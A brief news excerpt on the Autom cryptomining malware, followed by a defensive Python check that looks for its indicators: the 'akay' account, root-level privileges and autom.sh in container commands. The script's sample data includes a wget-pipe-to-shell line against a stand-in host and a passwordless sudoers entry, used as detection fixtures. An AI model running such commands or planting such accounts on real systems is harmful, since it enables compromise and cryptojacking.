Researchers from DevSecOps and cloud security firm Aqua Security have been tracking the malware operation for the past three years. Initial attacks involved executing a malicious command upon running a vanilla image named “alpine:latest”, which resulted in the download of a shell script named “autom.sh”. The shell script initiates the attack sequence, enabling the adversary to create a new user account under the name “akay” and upgrade its privileges to those of a root user, after which arbitrary commands are run on the compromised machine with the goal of mining cryptocurrency.
Source: https://thehackernews.com/2021/12/ongoing-autom-cryptomining-malware.html
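
A host triage check for the indicators named above, added here as an example and not taken from the article or from Aqua Security. It assumes the account's privilege upgrade would be visible as UID 0, admin-group membership or a sudoers entry (the article does not say how it is done); the group names, function names and all sample data are constructed.

```python
import re

# Indicators named in the article; everything else here is an assumption.
SCRIPT_NAME = "autom.sh"
ACCOUNT = "akay"
ADMIN_GROUPS = {"root", "sudo", "wheel"}  # assumed common admin groups
# Match the script name as a whole file name, not as part of a longer one.
SCRIPT_RE = re.compile(r"(?<![\w.-])" + re.escape(SCRIPT_NAME) + r"(?![\w.-])")

def account_findings(passwd_text, group_text, sudoers_text):
    """Report the named account and any sign that it holds root-level rights."""
    findings = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[0] == ACCOUNT:
            findings.append("account-present")
            if fields[2] == "0":  # UID 0 means the account is root-equivalent
                findings.append("account-uid-0")
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] in ADMIN_GROUPS:
            if ACCOUNT in fields[3].split(","):
                findings.append("member-of-" + fields[0])
    for line in sudoers_text.splitlines():
        tokens = line.split()
        # Only the text passed in is checked; included files are not followed.
        if tokens and not tokens[0].startswith("#") and tokens[0] == ACCOUNT:
            findings.append("sudoers-entry")
    return findings

def container_findings(starts):
    """Flag container starts (image, command) whose command names the script."""
    return ["script-in-command:" + image
            for image, command in starts if SCRIPT_RE.search(command)]

# Constructed sample data, not taken from a real host.
PASSWD = "root:x:0:0:root:/root:/bin/bash\nakay:x:1001:1001::/home/akay:/bin/bash\n"
GROUP = "root:x:0:\nsudo:x:27:akay\n"
SUDOERS = "# constructed sample\nroot ALL=(ALL:ALL) ALL\nakay ALL=(ALL) NOPASSWD:ALL\n"
STARTS = [
    ("alpine:latest", "sh -c 'wget -q http://example.invalid/autom.sh -O- | sh'"),
    ("nginx:1.25", "nginx -g 'daemon off;'"),
    ("alpine:latest", "sh -c 'cat /opt/myautom.sh.bak'"),
]

if __name__ == "__main__":
    for finding in account_findings(PASSWD, GROUP, SUDOERS) + container_findings(STARTS):
        print(finding)
```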

